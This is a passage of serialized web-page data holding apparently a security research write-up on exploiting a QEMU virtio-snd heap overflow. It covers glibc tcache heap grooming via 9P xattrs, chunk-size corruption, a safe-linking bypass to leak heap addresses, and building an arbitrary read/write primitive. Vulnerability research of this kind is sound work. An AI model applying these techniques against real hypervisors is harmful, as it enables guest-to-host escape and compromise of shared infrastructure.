|\n+----------+----------+----------+----------+----------+\n",[135852],{"type":27,"tag":84,"props":135853,"children":135854},{"__ignoreMap":7},[135855],{"type":33,"value":135850},{"type":27,"tag":36,"props":135857,"children":135858},{},[135859,135861,135866,135868,135873,135875,135880],{"type":33,"value":135860},"This lets us later create holes by freeing every other ",{"type":27,"tag":84,"props":135862,"children":135864},{"className":135863},[],[135865],{"type":33,"value":135111},{"type":33,"value":135867}," allocation. Those freed chunks enter the freelist, allowing the overflowing virtio-snd buffer to be allocated into one of those holes and overflow into the ",{"type":27,"tag":84,"props":135869,"children":135871},{"className":135870},[],[135872],{"type":33,"value":131462},{"type":33,"value":135874}," field of the next live ",{"type":27,"tag":84,"props":135876,"children":135878},{"className":135877},[],[135879],{"type":33,"value":135111},{"type":33,"value":135881}," chunk.",{"type":27,"tag":36,"props":135883,"children":135884},{},[135885],{"type":33,"value":135886},"Of course, we do not know the initial state of the heap. In practice, it is fragmented and already contains many freelist entries. Fortunately, this is not a problem for glibc, since the allocator is deterministic. By allocating enough chunks of the size we want, malloc will first consume any suitable entries already present in the freelist. Once those are exhausted, subsequent allocations will be served from the top chunk in a contiguous fashion, giving us the continuous region we need.",{"type":27,"tag":36,"props":135888,"children":135889},{},[135890,135892,135897,135899,135904,135906,135911,135913,135918],{"type":33,"value":135891},"As mentioned earlier, ",{"type":27,"tag":84,"props":135893,"children":135895},{"className":135894},[],[135896],{"type":33,"value":135148},{"type":33,"value":135898}," always allocates two chunks: one for ",{"type":27,"tag":84,"props":135900,"children":135902},{"className":135901},[],[135903],{"type":33,"value":135104},{"type":33,"value":135905}," and one for ",{"type":27,"tag":84,"props":135907,"children":135909},{"className":135908},[],[135910],{"type":33,"value":135111},{"type":33,"value":135912},". We want to avoid having ",{"type":27,"tag":84,"props":135914,"children":135916},{"className":135915},[],[135917],{"type":33,"value":135104},{"type":33,"value":135919}," chunks inside our main contiguous region. There are two ways to approach this:",{"type":27,"tag":12719,"props":135921,"children":135922},{},[135923,135935],{"type":27,"tag":1232,"props":135924,"children":135925},{},[135926,135928,135933],{"type":33,"value":135927},"Make ",{"type":27,"tag":84,"props":135929,"children":135931},{"className":135930},[],[135932],{"type":33,"value":135104},{"type":33,"value":135934}," larger than the mmap threshold, so it is allocated from a separate mapping rather than from the main heap. This would give us the layout we want, but at the cost of dramatically increasing memory usage during heap spraying.",{"type":27,"tag":1232,"props":135936,"children":135937},{},[135938,135940,135945,135947,135952,135954,135959],{"type":33,"value":135939},"Prepare a separate region whose sole purpose is to absorb ",{"type":27,"tag":84,"props":135941,"children":135943},{"className":135942},[],[135944],{"type":33,"value":135104},{"type":33,"value":135946},"-sized allocations. Later, when we start building the main contiguous region, malloc will satisfy ",{"type":27,"tag":84,"props":135948,"children":135950},{"className":135949},[],[135951],{"type":33,"value":135104},{"type":33,"value":135953}," allocations from that separate freelist instead of placing them next to our ",{"type":27,"tag":84,"props":135955,"children":135957},{"className":135956},[],[135958],{"type":33,"value":135111},{"type":33,"value":135960}," chunks.",{"type":27,"tag":26163,"props":135962,"children":135964},{"id":135963},"separating-name-allocations",[135965],{"type":33,"value":135966},"Separating .name allocations",{"type":27,"tag":36,"props":135968,"children":135969},{},[135970,135972,135977,135979,135984],{"type":33,"value":135971},"We chose the second option. However, it is not as simple as issuing ",{"type":27,"tag":84,"props":135973,"children":135975},{"className":135974},[],[135976],{"type":33,"value":135148},{"type":33,"value":135978}," for N ",{"type":27,"tag":84,"props":135980,"children":135982},{"className":135981},[],[135983],{"type":33,"value":135104},{"type":33,"value":135985},"-sized allocations and then freeing them.",{"type":27,"tag":36,"props":135987,"children":135988},{},[135989,135991,135996,135997,136002,136003,136008,136010,136015,136017,136022],{"type":33,"value":135990},"At this point, we already know that ",{"type":27,"tag":84,"props":135992,"children":135994},{"className":135993},[],[135995],{"type":33,"value":135148},{"type":33,"value":135898},{"type":27,"tag":84,"props":135998,"children":136000},{"className":135999},[],[136001],{"type":33,"value":135104},{"type":33,"value":135905},{"type":27,"tag":84,"props":136004,"children":136006},{"className":136005},[],[136007],{"type":33,"value":135111},{"type":33,"value":136009},". If we simply call it with ",{"type":27,"tag":84,"props":136011,"children":136013},{"className":136012},[],[136014],{"type":33,"value":135111},{"type":33,"value":136016}," sized the same as ",{"type":27,"tag":84,"props":136018,"children":136020},{"className":136019},[],[136021],{"type":33,"value":135104},{"type":33,"value":136023},", we get a layout like this:",{"type":27,"tag":101,"props":136025,"children":136027},{"code":136026}," 0x20 0x20 0x20 0x20 0x20\n+----------+----------+----------+----------+----------+\n| | | | | |\n| .name A | .value A | .name B | .value B | .name C |\n| | | | | |\n+----------+----------+----------+----------+----------+\n",[136028],{"type":27,"tag":84,"props":136029,"children":136030},{"__ignoreMap":7},[136031],{"type":33,"value":136026},{"type":27,"tag":36,"props":136033,"children":136034},{},[136035,136037,136042,136044,136050,136052,136058,136060,136065,136067,136072,136074,136079],{"type":33,"value":136036},"With that heap state, issuing a ",{"type":27,"tag":84,"props":136038,"children":136040},{"className":136039},[],[136041],{"type":33,"value":135814},{"type":33,"value":136043}," request would first free ",{"type":27,"tag":84,"props":136045,"children":136047},{"className":136046},[],[136048],{"type":33,"value":136049},".name A",{"type":33,"value":136051}," and then ",{"type":27,"tag":84,"props":136053,"children":136055},{"className":136054},[],[136056],{"type":33,"value":136057},".value A",{"type":33,"value":136059},". When ",{"type":27,"tag":84,"props":136061,"children":136063},{"className":136062},[],[136064],{"type":33,"value":136057},{"type":33,"value":136066}," is freed, the allocator sees that the preceding chunk ",{"type":27,"tag":84,"props":136068,"children":136070},{"className":136069},[],[136071],{"type":33,"value":136049},{"type":33,"value":136073}," is already free and immediately consolidates the two. As a result, instead of ending up with many reusable ",{"type":27,"tag":84,"props":136075,"children":136077},{"className":136076},[],[136078],{"type":33,"value":135104},{"type":33,"value":136080},"-sized chunks in the freelist, we would just create a large consolidated free chunk, which is not what we want.",{"type":27,"tag":36,"props":136082,"children":136083},{},[136084],{"type":33,"value":136085},"To avoid that, we take advantage of the fact that chunks freed into tcache are not consolidated. It is also important to note that tcache maintains a separate freelist for each size class within the tcache range, and in this glibc version each such freelist can hold up to 16 entries.",{"type":27,"tag":36,"props":136087,"children":136088},{},[136089,136091,136096,136098,136103,136105,136110,136112,136118,136120,136125,136127,136133],{"type":33,"value":136090},"We begin by draining the tcache freelist for every relevant size class by allocating 16 chunks of each size. Throughout this process, the ",{"type":27,"tag":84,"props":136092,"children":136094},{"className":136093},[],[136095],{"type":33,"value":135104},{"type":33,"value":136097}," allocation remains fixed at size ",{"type":27,"tag":84,"props":136099,"children":136101},{"className":136100},[],[136102],{"type":33,"value":112272},{"type":33,"value":136104},". We first allocate 16 xattrs whose ",{"type":27,"tag":84,"props":136106,"children":136108},{"className":136107},[],[136109],{"type":33,"value":135111},{"type":33,"value":136111}," size is ",{"type":27,"tag":84,"props":136113,"children":136115},{"className":136114},[],[136116],{"type":33,"value":136117},"0x30",{"type":33,"value":136119},". After that, we allocate another 16 xattrs, this time with ",{"type":27,"tag":84,"props":136121,"children":136123},{"className":136122},[],[136124],{"type":33,"value":135111},{"type":33,"value":136126}," size ",{"type":27,"tag":84,"props":136128,"children":136130},{"className":136129},[],[136131],{"type":33,"value":136132},"0x40",{"type":33,"value":136134},", and continue in the same way for each tcache size class.",{"type":27,"tag":36,"props":136136,"children":136137},{},[136138],{"type":33,"value":136139},"This yields the following layout:",{"type":27,"tag":101,"props":136141,"children":136143},{"code":136142}," 0x20 0x30 0x20 0x30\n+---------+--------------+---------+--------------+- - - - -\n| | | | |\n| .name A | .value A | .name B | .value B | . . .\n| | | | |\n+---------+--------------+---------+--------------+- - - - -\n\n 0x20 0x40 0x20 0x40\n+---------+------------------+---------+------------------+- - - - -\n| | | | |\n| .name C | .value C | .name D | .value D | . . .\n| | | | |\n+---------+------------------+---------+------------------+- - - - -\n",[136144],{"type":27,"tag":84,"props":136145,"children":136146},{"__ignoreMap":7},[136147],{"type":33,"value":136142},{"type":27,"tag":36,"props":136149,"children":136150},{},[136151,136153,136158,136160,136165,136167,136172,136174,136179,136181,136186,136188,136193,136194,136199,136201,136206,136208,136213,136215,136220,136222,136227,136229,136234],{"type":33,"value":136152},"At this point, we can free all allocations created during this phase. Because we emptied every tcache freelist, the first 16 ",{"type":27,"tag":84,"props":136154,"children":136156},{"className":136155},[],[136157],{"type":33,"value":135104},{"type":33,"value":136159}," chunks end up in the ",{"type":27,"tag":84,"props":136161,"children":136163},{"className":136162},[],[136164],{"type":33,"value":112272},{"type":33,"value":136166}," tcache bin, along with the interleaved ",{"type":27,"tag":84,"props":136168,"children":136170},{"className":136169},[],[136171],{"type":33,"value":135111},{"type":33,"value":136173}," chunks of size ",{"type":27,"tag":84,"props":136175,"children":136177},{"className":136176},[],[136178],{"type":33,"value":136117},{"type":33,"value":136180},". The next 16 ",{"type":27,"tag":84,"props":136182,"children":136184},{"className":136183},[],[136185],{"type":33,"value":135104},{"type":33,"value":136187}," chunks are interleaved with ",{"type":27,"tag":84,"props":136189,"children":136191},{"className":136190},[],[136192],{"type":33,"value":135111},{"type":33,"value":136173},{"type":27,"tag":84,"props":136195,"children":136197},{"className":136196},[],[136198],{"type":33,"value":136132},{"type":33,"value":136200},"; when freed, those ",{"type":27,"tag":84,"props":136202,"children":136204},{"className":136203},[],[136205],{"type":33,"value":135111},{"type":33,"value":136207}," chunks also go into their corresponding tcache bin instead of consolidating with the adjacent free ",{"type":27,"tag":84,"props":136209,"children":136211},{"className":136210},[],[136212],{"type":33,"value":135104},{"type":33,"value":136214}," chunks. Repeating this across all tcache sizes leaves us with a large region of free ",{"type":27,"tag":84,"props":136216,"children":136218},{"className":136217},[],[136219],{"type":33,"value":135104},{"type":33,"value":136221},"-sized chunks that will later be served to the ",{"type":27,"tag":84,"props":136223,"children":136225},{"className":136224},[],[136226],{"type":33,"value":135104},{"type":33,"value":136228}," allocations of the main contiguous spray - leaving us with the desired layout of adjacent ",{"type":27,"tag":84,"props":136230,"children":136232},{"className":136231},[],[136233],{"type":33,"value":135111},{"type":33,"value":135960},{"type":27,"tag":58,"props":136236,"children":136238},{"id":136237},"corrupting-the-size",[136239],{"type":33,"value":136240},"Corrupting the Size",{"type":27,"tag":36,"props":136242,"children":136243},{},[136244,136246,136251,136253,136258,136260,136265,136267,136272,136273,136278],{"type":33,"value":136245},"The input format is guest-controlled, and we choose ",{"type":27,"tag":84,"props":136247,"children":136249},{"className":136248},[],[136250],{"type":33,"value":10709},{"type":33,"value":136252}," (unsigned 8-bit PCM). As noted earlier, silence in ",{"type":27,"tag":84,"props":136254,"children":136256},{"className":136255},[],[136257],{"type":33,"value":10709},{"type":33,"value":136259}," is centered at ",{"type":27,"tag":84,"props":136261,"children":136263},{"className":136262},[],[136264],{"type":33,"value":36701},{"type":33,"value":136266}," (rather than ",{"type":27,"tag":84,"props":136268,"children":136270},{"className":136269},[],[136271],{"type":33,"value":133367},{"type":33,"value":133354},{"type":27,"tag":84,"props":136274,"children":136276},{"className":136275},[],[136277],{"type":33,"value":133345},{"type":33,"value":136279},"), which biases this uncontrolled overflow toward larger byte values and increases the chance that the corrupted size grows.",{"type":27,"tag":36,"props":136281,"children":136282},{},[136283,136285,136290],{"type":33,"value":136284},"As we already concluded, ",{"type":27,"tag":84,"props":136286,"children":136288},{"className":136287},[],[136289],{"type":33,"value":132810},{"type":33,"value":136291}," is called with the amount:",{"type":27,"tag":101,"props":136293,"children":136295},{"code":136294},"MIN(available, (stream->params.period_bytes - buffer->size))\n",[136296],{"type":27,"tag":84,"props":136297,"children":136298},{"__ignoreMap":7},[136299],{"type":33,"value":136294},{"type":27,"tag":36,"props":136301,"children":136302},{},[136303,136305,136310,136312,136317],{"type":33,"value":136304},"And as mentioned earlier, ",{"type":27,"tag":84,"props":136306,"children":136308},{"className":136307},[],[136309],{"type":33,"value":132841},{"type":33,"value":136311}," is fully guest-controlled, so we can set it such that the overflow reaches exactly far enough to overwrite only the lowest byte of the next chunk's ",{"type":27,"tag":84,"props":136313,"children":136315},{"className":136314},[],[136316],{"type":33,"value":131462},{"type":33,"value":65559},{"type":27,"tag":36,"props":136319,"children":136320},{},[136321,136323,136328,136330,136335],{"type":33,"value":136322},"With the desired heap layout of repeated ",{"type":27,"tag":84,"props":136324,"children":136326},{"className":136325},[],[136327],{"type":33,"value":135013},{"type":33,"value":136329},"-sized ",{"type":27,"tag":84,"props":136331,"children":136333},{"className":136332},[],[136334],{"type":33,"value":135111},{"type":33,"value":136336}," chunks in place, we can then free every other one:",{"type":27,"tag":101,"props":136338,"children":136340},{"code":136339}," Free Free\n+----------+----------+----------+----------+----------+\n| |..........| |..........| |\n| .value A |..........| .value C |..........| .value E |\n| |..........| |..........| |\n+----------+----------+----------+----------+----------+\n",[136341],{"type":27,"tag":84,"props":136342,"children":136343},{"__ignoreMap":7},[136344],{"type":33,"value":136339},{"type":27,"tag":36,"props":136346,"children":136347},{},[136348,136350,136355],{"type":33,"value":136349},"We then allocate the overflowing virtio-snd buffer into one of those holes, start the stream, and let it overflow into the size field of the ",{"type":27,"tag":84,"props":136351,"children":136353},{"className":136352},[],[136354],{"type":33,"value":135111},{"type":33,"value":136356}," chunk directly next to it:",{"type":27,"tag":101,"props":136358,"children":136360},{"code":136359}," +----------+\n | | Free\n+----------| buffer |----------+----------+----------+\n| | | |..........| |\n| .value A +----------+ .value C |..........| .value E |\n| | | |..........| |\n+----------+ +----------+----------+----------+\n",[136361],{"type":27,"tag":84,"props":136362,"children":136363},{"__ignoreMap":7},[136364],{"type":33,"value":136359},{"type":27,"tag":36,"props":136366,"children":136367},{},[136368,136370,136375,136377,136382],{"type":33,"value":136369},"After the overflow, the virtio-snd buffer is freed by QEMU. We then refill all of the holes created for the virtio-snd buffer by allocating new ",{"type":27,"tag":84,"props":136371,"children":136373},{"className":136372},[],[136374],{"type":33,"value":135013},{"type":33,"value":136376},"-sized chunks in their place. At that point, we are left with a layout similar to the original one, except that one ",{"type":27,"tag":84,"props":136378,"children":136380},{"className":136379},[],[136381],{"type":33,"value":135111},{"type":33,"value":136383}," chunk now has a corrupted and likely oversized size field:",{"type":27,"tag":101,"props":136385,"children":136387},{"code":136386}," Oversized chunk\n |\n +------+------+\n | |\n v v\n+----------+----------+----------+----------+----------+\n| | | | | |\n| .value A | .value X | .value C | .value Y | .value E |\n| | | | | |\n+----------+----------+----------+----------+----------+\n",[136388],{"type":27,"tag":84,"props":136389,"children":136390},{"__ignoreMap":7},[136391],{"type":33,"value":136386},{"type":27,"tag":36,"props":136393,"children":136394},{},[136395,136397,136402],{"type":33,"value":136396},"At this point, we can free the chunks left over from the initial contiguous spray. Because one chunk now has a corrupted, larger size field, freeing it causes a single oversized chunk to be inserted into one of the tcache bins in the range ",{"type":27,"tag":84,"props":136398,"children":136400},{"className":136399},[],[136401],{"type":33,"value":135028},{"type":33,"value":736},{"type":27,"tag":101,"props":136404,"children":136406},{"code":136405}," Free\n 0x210-0x2f0\n |\n +------+------+\n Free | | Free\n 0x200 v v 0x200\n+----------+----------+----------+----------+----------+\n|..........| |..........| |..........|\n|..........| .value X |..........| .value Y |..........|\n|..........| |..........| |..........|\n+----------+----------+----------+----------+----------+\n",[136407],{"type":27,"tag":84,"props":136408,"children":136409},{"__ignoreMap":7},[136410],{"type":33,"value":136405},{"type":27,"tag":36,"props":136412,"children":136413},{},[136414,136416,136421],{"type":33,"value":136415},"We then once again fill the remaining holes and recover the oversized chunk by simply allocating every size in the possible range (",{"type":27,"tag":84,"props":136417,"children":136419},{"className":136418},[],[136420],{"type":33,"value":135028},{"type":33,"value":28014},{"type":27,"tag":101,"props":136423,"children":136425},{"code":136424}," .value B\n +-------------+\n | |\n v v\n+----------+----------+----------+--+-------+----------+\n| | | |//| | |\n| .value A | .value X | |//| | .value C |\n| | | |//| | |\n+----------+----------+----------+--+-------+----------+\n ^ ^\n | |\n +----------+\n .value Y\n",[136426],{"type":27,"tag":84,"props":136427,"children":136428},{"__ignoreMap":7},[136429],{"type":33,"value":136424},{"type":27,"tag":36,"props":136431,"children":136432},{},[136433,136435,136441],{"type":33,"value":136434},"After reclaiming it, we use that chunk to overwrite the size of the next chunk again, but this time we set it to ",{"type":27,"tag":84,"props":136436,"children":136438},{"className":136437},[],[136439],{"type":33,"value":136440},"0x400",{"type":33,"value":136442}," - this gives us a chunk that fully overlaps the chunk next to it, leaving us in the following final state:",{"type":27,"tag":101,"props":136444,"children":136446},{"code":136445}," .value Y extended\n |\n +----------+----------+\n | |\n v v\n+----------+----------+----------+----------+----------+\n| | | | | |\n| .value A | .value X | .value B | .value Y | .value C |\n| | | | | |\n+----------+----------+----------+----------+----------+\n",[136447],{"type":27,"tag":84,"props":136448,"children":136449},{"__ignoreMap":7},[136450],{"type":33,"value":136445},{"type":27,"tag":58,"props":136452,"children":136454},{"id":136453},"leaking-a-heap-address",[136455],{"type":33,"value":136456},"Leaking a Heap Address",{"type":27,"tag":36,"props":136458,"children":136459},{},[136460],{"type":33,"value":136461},"We begin by leaking a heap address, since that is the simplest target at this stage. More specifically, we want the address of a heap chunk whose contents we control. Once we have that, we gain a region of memory at a known address with controlled contents, which is useful for placing fake objects or reclaiming the same location with other objects and later inspecting them with an arbitrary read primitive.",{"type":27,"tag":36,"props":136463,"children":136464},{},[136465,136467,136473],{"type":33,"value":136466},"To do this, we abuse the forward (",{"type":27,"tag":84,"props":136468,"children":136470},{"className":136469},[],[136471],{"type":33,"value":136472},"fd",{"type":33,"value":136474},") pointers used by tcache freelists. Modern glibc protects these pointers with a mitigation known as safe-linking. Instead of storing the next free chunk pointer directly, glibc encodes it by XORing it with the address of the current chunk, shifted right by 12:",{"type":27,"tag":101,"props":136476,"children":136478},{"code":136477},"fd = next ^ (curr >> 12)\n",[136479],{"type":27,"tag":84,"props":136480,"children":136481},{"__ignoreMap":7},[136482],{"type":33,"value":136477},{"type":27,"tag":36,"props":136484,"children":136485},{},[136486,136488,136493,136494,136499],{"type":33,"value":136487},"When a tcache bin is empty and a single chunk is inserted into it, ",{"type":27,"tag":84,"props":136489,"children":136491},{"className":136490},[],[136492],{"type":33,"value":4186},{"type":33,"value":12784},{"type":27,"tag":84,"props":136495,"children":136497},{"className":136496},[],[136498],{"type":33,"value":61732},{"type":33,"value":136500}," because there is no following entry. In that case, the encoding becomes:",{"type":27,"tag":101,"props":136502,"children":136504},{"code":136503},"fd = 0 ^ (curr >> 12)\n",[136505],{"type":27,"tag":84,"props":136506,"children":136507},{"__ignoreMap":7},[136508],{"type":33,"value":136503},{"type":27,"tag":36,"props":136510,"children":136511},{},[136512,136514,136519],{"type":33,"value":136513},"So if we free a single chunk into an empty tcache bin, its ",{"type":27,"tag":84,"props":136515,"children":136517},{"className":136516},[],[136518],{"type":33,"value":136472},{"type":33,"value":136520}," field is effectively just the chunk address shifted right by 12.",{"type":27,"tag":36,"props":136522,"children":136523},{},[136524],{"type":33,"value":136525},"In the overlap we achieved earlier:",{"type":27,"tag":101,"props":136527,"children":136529},{"code":136528}," .value Y extended\n |\n+--------------------+--------------------+\n| |\n| |\nv v\n+--------------------+--------------------+\n| | |\n| .value Y | .value C |\n| | |\n+--------------------+--------------------+\n",[136530],{"type":27,"tag":84,"props":136531,"children":136532},{"__ignoreMap":7},[136533],{"type":33,"value":136528},{"type":27,"tag":36,"props":136535,"children":136536},{},[136537,136539,136545,136547,136553,136555,136561,136563,136568],{"type":33,"value":136538},"We first free ",{"type":27,"tag":84,"props":136540,"children":136542},{"className":136541},[],[136543],{"type":33,"value":136544},".value C",{"type":33,"value":136546}," into tcache and read its contents through the oversized ",{"type":27,"tag":84,"props":136548,"children":136550},{"className":136549},[],[136551],{"type":33,"value":136552},".value Y",{"type":33,"value":136554},". This gives us ",{"type":27,"tag":84,"props":136556,"children":136558},{"className":136557},[],[136559],{"type":33,"value":136560},".value C >> 12",{"type":33,"value":136562},". That is not yet the exact address of ",{"type":27,"tag":84,"props":136564,"children":136566},{"className":136565},[],[136567],{"type":33,"value":136544},{"type":33,"value":136569},", since the lower 12 bits are lost.",{"type":27,"tag":36,"props":136571,"children":136572},{},[136573,136575,136580,136582,136587,136589,136594,136596,136601],{"type":33,"value":136574},"To recover the exact address of a controlled heap chunk, we reclaim ",{"type":27,"tag":84,"props":136576,"children":136578},{"className":136577},[],[136579],{"type":33,"value":136544},{"type":33,"value":136581},", then free a different controlled chunk into the same tcache bin. After that, we free ",{"type":27,"tag":84,"props":136583,"children":136585},{"className":136584},[],[136586],{"type":33,"value":136544},{"type":33,"value":136588}," again. This time, ",{"type":27,"tag":84,"props":136590,"children":136592},{"className":136591},[],[136593],{"type":33,"value":4186},{"type":33,"value":136595}," is no longer ",{"type":27,"tag":84,"props":136597,"children":136599},{"className":136598},[],[136600],{"type":33,"value":61732},{"type":33,"value":136602},", but instead points to that controlled chunk, so the encoded forward pointer becomes:",{"type":27,"tag":101,"props":136604,"children":136605},{"code":136477},[136606],{"type":27,"tag":84,"props":136607,"children":136608},{"__ignoreMap":7},[136609],{"type":33,"value":136477},{"type":27,"tag":36,"props":136611,"children":136612},{},[136613,136615,136621,136623,136628,136630,136635,136637,136642],{"type":33,"value":136614},"Since we already know ",{"type":27,"tag":84,"props":136616,"children":136618},{"className":136617},[],[136619],{"type":33,"value":136620},"curr >> 12",{"type":33,"value":136622}," from the first leak, we can read the new ",{"type":27,"tag":84,"props":136624,"children":136626},{"className":136625},[],[136627],{"type":33,"value":136472},{"type":33,"value":136629}," value from ",{"type":27,"tag":84,"props":136631,"children":136633},{"className":136632},[],[136634],{"type":33,"value":136544},{"type":33,"value":136636}," and recover the exact address of ",{"type":27,"tag":84,"props":136638,"children":136640},{"className":136639},[],[136641],{"type":33,"value":4186},{"type":33,"value":136643}," by reversing the XOR:",{"type":27,"tag":101,"props":136645,"children":136647},{"code":136646},"next = fd ^ (curr >> 12)\n",[136648],{"type":27,"tag":84,"props":136649,"children":136650},{"__ignoreMap":7},[136651],{"type":33,"value":136646},{"type":27,"tag":36,"props":136653,"children":136654},{},[136655],{"type":33,"value":136656},"This gives us the exact address of a heap chunk whose contents we control.",{"type":27,"tag":58,"props":136658,"children":136660},{"id":136659},"arbitrary-read-and-write",[136661],{"type":33,"value":136662},"Arbitrary Read and Write",{"type":27,"tag":36,"props":136664,"children":136665},{},[136666,136668,136673],{"type":33,"value":136667},"Having a controlled chunk at a known address lets us repurpose ",{"type":27,"tag":84,"props":136669,"children":136671},{"className":136670},[],[136672],{"type":33,"value":136544},{"type":33,"value":136674}," into an arbitrary read/write primitive. To do that, we go back to the 9P device.",{"type":27,"tag":36,"props":136676,"children":136677},{},[136678,136680,136685],{"type":33,"value":136679},"Recall ",{"type":27,"tag":84,"props":136681,"children":136683},{"className":136682},[],[136684],{"type":33,"value":135148},{"type":33,"value":736},{"type":27,"tag":101,"props":136687,"children":136689},{"code":136688,"language":10435,"meta":7,"className":23789,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n uint64_t size;\n V9fsFidState *file_fidp;\n V9fsFidState *xattr_fidp;\n\n [...]\n\n file_fidp = get_fid(pdu, fid);\n\n [...]\n\n /* Make the file fid point to xattr */\n xattr_fidp = file_fidp;\n xattr_fidp->fs.xattr.len = size;\n xattr_fidp->fs.xattr.value = g_malloc0(size);\n\n [...]\n",[136690],{"type":27,"tag":84,"props":136691,"children":136692},{"__ignoreMap":7},[136693,136732,136739,136750,136765,136780,136787,136794,136801,136823,136830,136837,136844,136852,136869,136908,136951,136958],{"type":27,"tag":207,"props":136694,"children":136695},{"class":209,"line":210},[136696,136700,136704,136708,136712,136716,136720,136724,136728],{"type":27,"tag":207,"props":136697,"children":136698},{"style":214},[136699],{"type":33,"value":58283},{"type":27,"tag":207,"props":136701,"children":136702},{"style":214},[136703],{"type":33,"value":58288},{"type":27,"tag":207,"props":136705,"children":136706},{"style":238},[136707],{"type":33,"value":135143},{"type":27,"tag":207,"props":136709,"children":136710},{"style":1335},[136711],{"type":33,"value":135148},{"type":27,"tag":207,"props":136713,"children":136714},{"style":238},[136715],{"type":33,"value":1343},{"type":27,"tag":207,"props":136717,"children":136718},{"style":214},[136719],{"type":33,"value":58863},{"type":27,"tag":207,"props":136721,"children":136722},{"style":226},[136723],{"type":33,"value":17093},{"type":27,"tag":207,"props":136725,"children":136726},{"style":220},[136727],{"type":33,"value":135165},{"type":27,"tag":207,"props":136729,"children":136730},{"style":238},[136731],{"type":33,"value":10449},{"type":27,"tag":207,"props":136733,"children":136734},{"class":209,"line":244},[136735],{"type":27,"tag":207,"props":136736,"children":136737},{"style":238},[136738],{"type":33,"value":18158},{"type":27,"tag":207,"props":136740,"children":136741},{"class":209,"line":270},[136742,136746],{"type":27,"tag":207,"props":136743,"children":136744},{"style":214},[136745],{"type":33,"value":62848},{"type":27,"tag":207,"props":136747,"children":136748},{"style":238},[136749],{"type":33,"value":131804},{"type":27,"tag":207,"props":136751,"children":136752},{"class":209,"line":296},[136753,136757,136761],{"type":27,"tag":207,"props":136754,"children":136755},{"style":238},[136756],{"type":33,"value":135290},{"type":27,"tag":207,"props":136758,"children":136759},{"style":226},[136760],{"type":33,"value":9286},{"type":27,"tag":207,"props":136762,"children":136763},{"style":238},[136764],{"type":33,"value":135299},{"type":27,"tag":207,"props":136766,"children":136767},{"class":209,"line":445},[136768,136772,136776],{"type":27,"tag":207,"props":136769,"children":136770},{"style":238},[136771],{"type":33,"value":135290},{"type":27,"tag":207,"props":136773,"children":136774},{"style":226},[136775],{"type":33,"value":9286},{"type":27,"tag":207,"props":136777,"children":136778},{"style":238},[136779],{"type":33,"value":135315},{"type":27,"tag":207,"props":136781,"children":136782},{"class":209,"line":867},[136783],{"type":27,"tag":207,"props":136784,"children":136785},{"emptyLinePlaceholder":19},[136786],{"type":33,"value":2062},{"type":27,"tag":207,"props":136788,"children":136789},{"class":209,"line":892},[136790],{"type":27,"tag":207,"props":136791,"children":136792},{"style":238},[136793],{"type":33,"value":112006},{"type":27,"tag":207,"props":136795,"children":136796},{"class":209,"line":1475},[136797],{"type":27,"tag":207,"props":136798,"children":136799},{"emptyLinePlaceholder":19},[136800],{"type":33,"value":2062},{"type":27,"tag":207,"props":136802,"children":136803},{"class":209,"line":2065},[136804,136809,136813,136818],{"type":27,"tag":207,"props":136805,"children":136806},{"style":238},[136807],{"type":33,"value":136808}," file_fidp ",{"type":27,"tag":207,"props":136810,"children":136811},{"style":226},[136812],{"type":33,"value":10380},{"type":27,"tag":207,"props":136814,"children":136815},{"style":1335},[136816],{"type":33,"value":136817}," get_fid",{"type":27,"tag":207,"props":136819,"children":136820},{"style":238},[136821],{"type":33,"value":136822},"(pdu, fid);\n",{"type":27,"tag":207,"props":136824,"children":136825},{"class":209,"line":2092},[136826],{"type":27,"tag":207,"props":136827,"children":136828},{"emptyLinePlaceholder":19},[136829],{"type":33,"value":2062},{"type":27,"tag":207,"props":136831,"children":136832},{"class":209,"line":2130},[136833],{"type":27,"tag":207,"props":136834,"children":136835},{"style":238},[136836],{"type":33,"value":112006},{"type":27,"tag":207,"props":136838,"children":136839},{"class":209,"line":2168},[136840],{"type":27,"tag":207,"props":136841,"children":136842},{"emptyLinePlaceholder":19},[136843],{"type":33,"value":2062},{"type":27,"tag":207,"props":136845,"children":136846},{"class":209,"line":4095},[136847],{"type":27,"tag":207,"props":136848,"children":136849},{"style":4647},[136850],{"type":33,"value":136851}," /* Make the file fid point to xattr */\n",{"type":27,"tag":207,"props":136853,"children":136854},{"class":209,"line":4103},[136855,136860,136864],{"type":27,"tag":207,"props":136856,"children":136857},{"style":238},[136858],{"type":33,"value":136859}," xattr_fidp ",{"type":27,"tag":207,"props":136861,"children":136862},{"style":226},[136863],{"type":33,"value":10380},{"type":27,"tag":207,"props":136865,"children":136866},{"style":238},[136867],{"type":33,"value":136868}," file_fidp;\n",{"type":27,"tag":207,"props":136870,"children":136871},{"class":209,"line":4154},[136872,136876,136880,136884,136888,136892,136896,136900,136904],{"type":27,"tag":207,"props":136873,"children":136874},{"style":220},[136875],{"type":33,"value":135693},{"type":27,"tag":207,"props":136877,"children":136878},{"style":238},[136879],{"type":33,"value":8968},{"type":27,"tag":207,"props":136881,"children":136882},{"style":220},[136883],{"type":33,"value":44232},{"type":27,"tag":207,"props":136885,"children":136886},{"style":238},[136887],{"type":33,"value":1041},{"type":27,"tag":207,"props":136889,"children":136890},{"style":220},[136891],{"type":33,"value":135617},{"type":27,"tag":207,"props":136893,"children":136894},{"style":238},[136895],{"type":33,"value":1041},{"type":27,"tag":207,"props":136897,"children":136898},{"style":220},[136899],{"type":33,"value":16416},{"type":27,"tag":207,"props":136901,"children":136902},{"style":226},[136903],{"type":33,"value":229},{"type":27,"tag":207,"props":136905,"children":136906},{"style":238},[136907],{"type":33,"value":131804},{"type":27,"tag":207,"props":136909,"children":136910},{"class":209,"line":4203},[136911,136915,136919,136923,136927,136931,136935,136939,136943,136947],{"type":27,"tag":207,"props":136912,"children":136913},{"style":220},[136914],{"type":33,"value":135693},{"type":27,"tag":207,"props":136916,"children":136917},{"style":238},[136918],{"type":33,"value":8968},{"type":27,"tag":207,"props":136920,"children":136921},{"style":220},[136922],{"type":33,"value":44232},{"type":27,"tag":207,"props":136924,"children":136925},{"style":238},[136926],{"type":33,"value":1041},{"type":27,"tag":207,"props":136928,"children":136929},{"style":220},[136930],{"type":33,"value":135617},{"type":27,"tag":207,"props":136932,"children":136933},{"style":238},[136934],{"type":33,"value":1041},{"type":27,"tag":207,"props":136936,"children":136937},{"style":220},[136938],{"type":33,"value":4196},{"type":27,"tag":207,"props":136940,"children":136941},{"style":226},[136942],{"type":33,"value":229},{"type":27,"tag":207,"props":136944,"children":136945},{"style":1335},[136946],{"type":33,"value":131375},{"ty